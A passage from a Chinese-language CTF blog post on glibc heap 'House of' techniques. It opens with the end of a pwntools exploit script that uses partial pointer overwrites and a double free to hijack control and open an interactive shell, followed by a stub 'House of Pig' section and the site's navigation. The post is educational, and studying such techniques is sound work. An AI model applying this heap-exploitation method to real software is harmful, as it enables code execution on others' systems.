class="string">&#x27;a&#x27;</span>*<span class="number">0x68</span>+p64(<span class="number">0x41</span>))</span><br><span class="line">    free(<span class="number">1</span>)</span><br><span class="line">    add(<span class="number">0xa0</span>,<span class="number">3</span>)</span><br><span class="line">    add(<span class="number">0x68</span>,<span class="number">4</span>)</span><br><span class="line">    add(<span class="number">0x68</span>,<span class="number">5</span>)</span><br><span class="line">    add(<span class="number">0x68</span>,<span class="number">6</span>)</span><br><span class="line">    add(<span class="number">0x68</span>,<span class="number">13</span>)</span><br><span class="line">    free(<span class="number">4</span>)</span><br><span class="line">    free(<span class="number">5</span>)</span><br><span class="line">    edit(<span class="number">0</span>,<span class="string">&#x27;a&#x27;</span>*<span class="number">0x18</span>+<span class="string">&#x27;\x71&#x27;</span>)</span><br><span class="line">    edit(<span class="number">5</span>,p16(<span class="number">0x7020</span>))</span><br><span class="line">    edit(<span class="number">1</span>,p16(<span class="number">0x1aed</span>))</span><br><span class="line">    add(<span class="number">0x68</span>,<span class="number">7</span>)</span><br><span class="line">    add(<span class="number">0x68</span>,<span class="number">8</span>)</span><br><span class="line">    add(<span class="number">0x68</span>,<span class="number">9</span>)</span><br><span class="line">    free(<span class="number">13</span>)</span><br><span class="line">    edit(<span class="number">13</span>,p64(<span class="number">0</span>))</span><br><span class="line">    add(<span class="number">0x100</span>,<span class="number">10</span>)</span><br><span class="line">    add(<span class="number">0x20</span>,<span class="number">11</span>)</span><br><span class="line">    free(<span class="number">10</span>)</span><br><span class="line">    edit(<span class="number">10</span>,<span class="string">&#x27;a&#x27;</span>*<span class="number">8</span>+p16(<span class="number">0x1b00</span>))</span><br><span class="line">    add(<span class="number">0x100</span>,<span class="number">12</span>)</span><br><span class="line">    edit(<span class="number">9</span>,<span class="string">&#x27;a&#x27;</span>*<span class="number">0x13</span>+<span class="string">&#x27;\xa4\xd3\xaf&#x27;</span>)</span><br><span class="line">    <span class="comment">#gdb.attach(sh)</span></span><br><span class="line">    free(<span class="number">7</span>)</span><br><span class="line">    free(<span class="number">7</span>)</span><br><span class="line">    sh.interactive()</span><br><span class="line">sh.recvuntil(<span class="string">&#x27;Enter name :&#x27;</span>)</span><br><span class="line">sh.sendline(<span class="string">&#x27;rootzhang&#x27;</span>)</span><br><span class="line">pwn()</span><br></pre></td></tr></table></figure>

<h2 id="House-of-Pig"><a href="#House-of-Pig" class="headerlink" title="House of Pig"></a>House of Pig</h2><p>涉及了io_file,暂时不做总结</p>

    </div>

    
    
    

      <footer class="post-footer">

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2022/01/09/setcontext-mprotect-orw/" rel="prev" title="setcontext+mprotect+orw">
      <i class="fa fa-chevron-left"></i> setcontext+mprotect+orw
    </a></div>
      <div class="post-nav-item">
    <a href="/2022/01/11/io-file%E4%B9%8Bstdout/" rel="next" title="io_file之stdout">
      io_file之stdout <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#wiki%E4%B8%8A%E7%9A%84house%E7%B3%BB%E5%88%97"><span class="nav-number">1.</span> <span class="nav-text">wiki上的house系列</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#House-Of-Einherjar"><span class="nav-number">1.1.</span> <span class="nav-text">House Of Einherjar</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#House-Of-Force"><span class="nav-number">1.2.</span> <span class="nav-text">House Of Force</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#%E4%BE%8B%E9%A2%98%EF%BC%9AHITCON-training-lab-11"><span class="nav-number">1.2.0.0.1.</span> <span class="nav-text">例题：HITCON training lab 11</span></a></li></ol></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#House-of-Lore"><span class="nav-number">1.3.</span> <span class="nav-text">House of Lore</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#House-of-Orange"><span class="nav-number">1.4.</span> <span class="nav-text">House of Orange</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#House-of-Rabbit"><span class="nav-number">1.5.</span> <span class="nav-text">House of Rabbit</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#House-of-Roman"><span class="nav-number">1.6.</span> <span class="nav-text">House of Roman</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#House-of-Pig"><span class="nav-number">1.7.</span> <span class="nav-text">House of Pig</span></a></li></ol></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name">rootzhang</p>
  <div class="site-description" itemprop="description">我的博客</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">20</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
  </nav>
</div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2022</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">rootzhang</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Gemini</a> 强力驱动
  </div>

        








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>




  















  

  

</body>
</html>
